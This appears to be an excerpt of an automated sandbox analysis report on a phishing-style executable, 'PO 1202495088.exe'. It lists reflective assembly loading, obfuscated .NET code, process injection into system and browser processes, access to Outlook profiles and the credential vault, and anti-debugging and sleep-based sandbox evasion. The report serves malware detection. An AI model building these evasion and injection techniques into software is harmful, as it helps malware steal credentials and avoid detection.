                Source: C:\Windows\SysWOW64\cttune.exe Section loaded: dwrite.dll, oleacc.dll, uxtheme.dll, edgegdi.dll, wininet.dll, kernel.appcore.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Users\user\Desktop\PO 1202495088.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PO 1202495088.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO 1202495088.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO 1202495088.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: cttune.pdb source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: wntdll.pdb source: PO 1202495088.exe, PO 1202495088.exe, 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000D.00000003.1466694539.00000000047E5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1462966186.0000000004631000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp

                Data Obfuscation

                Source: PO 1202495088.exe, ServerForm.cs, .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4324028.4.raw.unpack, MainForm.cs, .Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.cs, .Net Code: yeuX8ln8Uy System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.cs, .Net Code: yeuX8ln8Uy System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4344048.1.raw.unpack, MainForm.cs, .Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.cs, .Net Code: yeuX8ln8Uy System.Reflection.Assembly.Load(byte[])
                Source: 12.2.RAVCpl64.exe.730cd14.0.raw.unpack, ServerForm.cs, .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 13.2.cttune.exe.505cd14.2.raw.unpack, ServerForm.cs, .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 14.2.firefox.exe.3300cd14.0.raw.unpack, ServerForm.cs, .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 1_2_075F6D4C push esp; retn 0754h, 1_2_075F6DB9
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 1_2_075F6CA8 push eax; iretd, 1_2_075F6CA9
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_004178CA push edx; iretd, 4_2_004178CD
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_004150EB push esp; iretd, 4_2_0041514F
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_0040D8B6 push ecx; ret, 4_2_0040D8B7
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_00415119 push esp; iretd, 4_2_0041514F
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_00424A53 push 3D550B4Fh; ret, 4_2_00424A6B
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_00417A3B push ebx; iretd, 4_2_00417A3C
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_00423D13 push edi; retf, 4_2_00423D1E
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_0040AEDA push FFFFFF84h; retf, 4_2_0040AEDC
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_004036A0 push eax; ret, 4_2_004036A2
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Code function: 4_2_013B08CD push ecx; mov dword ptr [esp], ecx, 4_2_013B08D6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 12_2_006A0064 push cs; retf, 12_2_006A0065
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 12_2_006AA8C8 push ebx; iretd, 12_2_006AA902
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 12_2_006A117B push cs; retf, 12_2_006A1182
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 12_2_006AAD1D push es; iretd, 12_2_006AAD1E
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 12_2_006AFEE2 push eax; ret, 12_2_006AFEE4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 12_2_006A23E2 push edx; ret, 12_2_006A23E3
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 12_2_006A9F9C push cs; retf, 12_2_006A9F9D
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 13_2_049C08CD push ecx; mov dword ptr [esp], ecx, 13_2_049C08D6
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 13_2_04CE5064 push cs; retf, 13_2_04CE5065
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 13_2_04CE617B push cs; retf, 13_2_04CE6182
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 13_2_04CE73E2 push edx; ret, 13_2_04CE73E3
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 13_2_04CEFD1D push es; iretd, 13_2_04CEFD1E
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 13_2_04CF4EE2 push eax; ret, 13_2_04CF4EE4
                Source: C:\Windows\SysWOW64\cttune.exe, Code function: 13_2_04CEF8C2 push ebx; iretd, 13_2_04CEF902
                Source: PO 1202495088.exe, Static PE information: section name: .text entropy: 7.712943967967854
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, HdFCn7AXQf15ObaaY8.csHigh entropy of concatenated method names: 'WJMIBsTot8', 'otKIJUbo68', 'v2qIINXUgF', 'iToIVJW3D2', 'LKwIsklnNc', 'o63IG645lL', 'Dispose', 'tIZhvmoEnH', 'HRVhbFEJhX', 'whFhTiBHUq'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, PxL28V9OxE8r41cBZU.csHigh entropy of concatenated method names: 'iM2HTm9AP4', 'DCEHn2EOVX', 'JrCHxNh3t9', 'v3sHW2hJYx', 'lirHIwR99N', 'ItJHQvBwPL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, b6h94FXIghc9d5DLCT.csHigh entropy of concatenated method names: 'Tnr5WUjTua', 'cHv5QFULjn', 'zVR57AuD1X', 'mxg5CuFNCJ', 'fEb5BmMPXF', 'hgh5SVeGHG', 'YhlFGX7qU4t4IqnHys', 'GdJgHZ6YHh6Zdahj8D', 'h2A55GT4Ie', 'Hb65UCgf6h'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, cDmf4BMyGvApCfOKj9.csHigh entropy of concatenated method names: 'nkuIg5rcyN', 'A3BIDaIHwO', 'TrUIZVr35r', 'VgqIYU8NG2', 'FxOIjeTvyH', 'rTXIKQtLSe', 'jqPI6AuFG6', 'yBBI3kYvhI', 'zaPIftLUF1', 'pnNI1GsFmb'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, nXFnghgVeGHGdgYcqW.csHigh entropy of concatenated method names: 'HpAxNpygtZ', 'zQNxbcjEhW', 'cLnxnQWbX0', 'mNsxWdJUh5', 'cpMxQLimlL', 'kD4n2kKXnb', 'vpOnqQhG9l', 'QMvnAZRpWG', 'cymnuOxxB5', 'CIGnMh8x6n'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, IUrGUY6io51EZYGAZ7.csHigh entropy of concatenated method names: 'XHJWvUaAiD', 'JDrWTIrYBW', 'DNhWxHiAcL', 'SBAx9a3q47', 'h91xzf7Eov', 'jSJWafGIWe', 'XbSW5xCFm4', 'EeWWpQHON8', 'hU0WUcASUC', 'yxOWXF7Ckc'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, rX8yfdzNTOVA7xoqVi.csHigh entropy of concatenated method names: 'aA7Hl8E4LM', 'DQpHExq9Xh', 'IR6Htd0dje', 'XBCHgiOpUB', 'oNpHDoNBpE', 'BkUHYpkMm9', 'KMwHju6k4m', 'xabHGPhE5r', 'Gt9HOjaMMH', 'gK7H4tPodd'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, xta7UEqSKx5JHuevPE.csHigh entropy of concatenated method names: 'zyoJuT0MYp', 'sEuJ9cRTOe', 'EIChayE65W', 'cNPh5ts8Pf', 'XL0JyPaCOd', 'h15JiXEPm3', 'qvmJo6eWHN', 'TbfJc6mW6K', 'JitJkER3gx', 'cynJmw4JH4'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, u55hdemhyodOW6Zp76.csHigh entropy of concatenated method names: 'ToString', 'BdTSyVvUtW', 'MHtSDZmIfu', 'BE5SZE5JED', 'LS4SYdTk5w', 'E8nSjlvc7X', 'WG6SKxQVLA', 'nyQS6MFFOV', 'OqjS3efxj4', 'UXiSf41ReP'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, PSiLU8tVRAuD1X7xgu.csHigh entropy of concatenated method names: 'cLNTRM7rfT', 'yP6TlXM0t6', 'jKDTEOJpQP', 'qK5TtWNYV7', 'hGgTBQKbdr', 'Jx6TSlmxmb', 'dEBTJxKZm0', 'TsnThexlBT', 'lFrTIBkkWu', 'NAaTHdeEfe'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, h0glaQcAaJPbe5OWvY.csHigh entropy of concatenated method names: 'fajB1cgVkT', 'jsGBivEJp1', 'OA4Bcttfo0', 'DZnBka1OnU', 'jRQBDL6JoL', 'TBYBZSdgSJ', 'KeQBYvnhrx', 'yLaBjCuLYd', 's5LBKBNmYF', 'dFrB6yjWdm'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, i0S4Wf55fSYhQhLvftS.csHigh entropy of concatenated method names: 'ICIH9INeqC', 'DelHzxvOHm', 'RogVaTxbpX', 'SjqV54tBL1', 'cOMVpMathu', 'WdTVU7ALna', 'zpHVXITjWR', 'TXaVNNnObL', 'aKAVvvQ9DJ', 'dc7VbFWfES'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, OolqYAbysusZjsMC55.csHigh entropy of concatenated method names: 'Dispose', 'M155MObaaY', 'tiGpDsTOlE', 'BlDcKtDjPB', 'zB559CKVtI', 'ENG5zx4eDd', 'ProcessDialogKey', 'PxUpaDmf4B', 'OGvp5ApCfO', 'Kj9ppoxL28'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.csHigh entropy of concatenated method names: 'mU6UN23GXr', 'nn3UvZEnBf', 'Vj5UbYbpGi', 'wACUTp03M8', 'XmfUnLvlKa', 'TZpUxEISZP', 'UOEUWcrX5r', 'qxNUQMWDKN', 'bWsUFIw5Ub', 'LMuU7mSjHn'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, uUjTuaEUHvFULjn8cB.csHigh entropy of concatenated method names: 'ob5bcEeegd', 'tQfbkuRmHZ', 'EFmbm4CKeL', 'kPsbLOMMxx', 'bcNb2wd6MH', 'aRhbqpcnVv', 'qf4bA8Tf8a', 'K4wbuo2wl9', 'h0ObMMid3G', 'IdPb9jmqbD'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, DVXfhs5XQlcE3viVe4G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ktlrIFRyUS', 'i5qrHWlctW', 'ejerVle72e', 'kqIrrDF1wZ', 'ymIrswEIQx', 'KAIreUquMG', 'pmgrGSXgxl'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, Lb30oD5NZSl2idqgsue.csHigh entropy of concatenated method names: 'luPgP9ZZfyjpF', 'b6jUrfl3q8wOKhB4PvU', 'W3iHfPlEPqNQY56Ny0V', 'I1DPWtlPkGRCOewOeqJ', 'y0MIablYwGaEsD2lYNS', 'zdhffAlUkT8BmOcR0uA'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, XOlZVOoLm4JP3UJtnJ.csHigh entropy of concatenated method names: 'WO9PE0tTyS', 'X6TPt6VnVV', 'riyPgxIuTw', 'DNMPDPCKB7', 'H8vPYR9AF5', 'fg1PjS1S4Z', 'LMeP6ufuoM', 'TJ8P3rJOVs', 'tRlP1hMdrv', 'XgXPyu5ZnA'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, k5BBnjfuXoDcUptWYL.csHigh entropy of concatenated method names: 's0ZWOyxtWL', 'JgZW4rqEUw', 'M9CW8yt5xl', 'tB3WRI4mbm', 'dOrWdrC8WN', 'G2DWlGkD25', 'yJYWw0Pk2S', 'FaeWEX4Ktk', 'k8kWtyWUr7', 'Pj2W0nTkcJ'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, W1hFvapKrUm5wvGUxP.csHigh entropy of concatenated method names: 'QwJ8uAZGf', 'GMARiD7j1', 'iFNlAKRf6', 'ahCwjNNCI', 'TI2t5jfJN', 'lPb0y8goK', 'vrlTS2XIC6XBEx4UaU', 'caJKBmAV0BnIQ3ohOv', 'TZbhdeaGB', 'foLH4tKH8'
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, HNmpxA5pVuEotTu6A3N.csHigh entropy of concatenated method names: 'ToString', 'JINVEhuo5m', 'Mn9VtpaOgm', 'ORvV072ZZX', 'MXNVgpK5PA', 'RkHVDH4jBU', 'WpyVZCkZvp', 'CKEVYo3bhU', 'nrA5fSnIMHeyraRP6sd', 'eURcqgnGMG8CoFO3vj0'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\PO 1202495088.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: PO 1202495088.exe PID: 3264, type: MEMORYSTR
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D144
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B330594
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32FF74
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D6C4
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D864
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D004
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D144
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B330594
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D764
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D324
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D364
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D004
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32FF74
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D6C4
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D864
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D604
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 30E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 32F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 3200000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 7610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 73C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 8610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 9610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 9C90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: AC90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: BC90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F088E rdtsc 4_2_013F088E
                Source: C:\Users\user\Desktop\PO 1202495088.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9891
                Source: C:\Windows\SysWOW64\cttune.exeWindow / User API: threadDelayed 9010
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI coverage: 0.9 %
                Source: C:\Windows\SysWOW64\cttune.exeAPI coverage: 1.2 %
                Source: C:\Users\user\Desktop\PO 1202495088.exe TID: 6520Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 8164Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep count: 121 > 30
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep time: -242000s >= -30000s
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep count: 9010 > 30
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep time: -18020000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cttune.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PO 1202495088.exeThread delayed: delay time: 922337203685477
                Source: cttune.exe, 0000000D.00000002.5164151299.0000000000A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8%
                Source: svchost.exe, 00000005.00000002.2810649508.0000019710C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2811638902.0000019712A8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: RAVCpl64.exe, 0000000C.00000002.6023320598.00000000004FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: firefox.exe, 0000000E.00000002.1753371044.0000020832F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\cttune.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F088E rdtsc 4_2_013F088E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00417EB3 LdrLoadDll,4_2_00417EB3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0118 mov eax, dword ptr fs:[00000030h]4_2_013E0118
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6179 mov eax, dword ptr fs:[00000030h]4_2_013B6179
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E415F mov eax, dword ptr fs:[00000030h]4_2_013E415F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143A130 mov eax, dword ptr fs:[00000030h]4_2_0143A130
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA147 mov eax, dword ptr fs:[00000030h]4_2_013AA147
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E41BB mov ecx, dword ptr fs:[00000030h]4_2_013E41BB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E41BB mov eax, dword ptr fs:[00000030h]4_2_013E41BB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE1A4 mov eax, dword ptr fs:[00000030h]4_2_013EE1A4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014781EE mov eax, dword ptr fs:[00000030h]4_2_014781EE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4180 mov eax, dword ptr fs:[00000030h]4_2_013B4180
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C01F1 mov eax, dword ptr fs:[00000030h]4_2_013C01F1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A81EB mov eax, dword ptr fs:[00000030h]4_2_013A81EB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA1E3 mov eax, dword ptr fs:[00000030h]4_2_013BA1E3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C01C0 mov eax, dword ptr fs:[00000030h]4_2_013C01C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01436040 mov eax, dword ptr fs:[00000030h]4_2_01436040
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2010 mov ecx, dword ptr fs:[00000030h]4_2_013F2010
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8009 mov eax, dword ptr fs:[00000030h]4_2_013B8009
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6074 mov eax, dword ptr fs:[00000030h]4_2_013B6074
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0044 mov eax, dword ptr fs:[00000030h]4_2_013E0044
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F00A5 mov eax, dword ptr fs:[00000030h]4_2_013F00A5
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C0E0 mov ecx, dword ptr fs:[00000030h]4_2_0143C0E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA093 mov ecx, dword ptr fs:[00000030h]4_2_013AA093
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC090 mov eax, dword ptr fs:[00000030h]4_2_013AC090
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC0F6 mov eax, dword ptr fs:[00000030h]4_2_013AC0F6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446090 mov eax, dword ptr fs:[00000030h]4_2_01446090
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE328 mov eax, dword ptr fs:[00000030h]4_2_013AE328
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E8322 mov eax, dword ptr fs:[00000030h]4_2_013E8322
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E631F mov eax, dword ptr fs:[00000030h]4_2_013E631F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CE310 mov eax, dword ptr fs:[00000030h]4_2_013CE310
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E372 mov eax, dword ptr fs:[00000030h]4_2_0142E372
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430371 mov eax, dword ptr fs:[00000030h]4_2_01430371
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D237A mov eax, dword ptr fs:[00000030h]4_2_013D237A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145630E mov eax, dword ptr fs:[00000030h]4_2_0145630E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464320 mov eax, dword ptr fs:[00000030h]4_2_01464320
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA350 mov eax, dword ptr fs:[00000030h]4_2_013EA350
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A8347 mov eax, dword ptr fs:[00000030h]4_2_013A8347
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A8347 mov eax, dword ptr fs:[00000030h]4_2_013A8347
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A8347 mov eax, dword ptr fs:[00000030h]4_2_013A8347
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014343D5 mov eax, dword ptr fs:[00000030h]4_2_014343D5
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E3DD mov eax, dword ptr fs:[00000030h]4_2_0143E3DD
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DA390 mov eax, dword ptr fs:[00000030h]4_2_013DA390
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DA390 mov eax, dword ptr fs:[00000030h]4_2_013DA390
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DA390 mov eax, dword ptr fs:[00000030h]4_2_013DA390
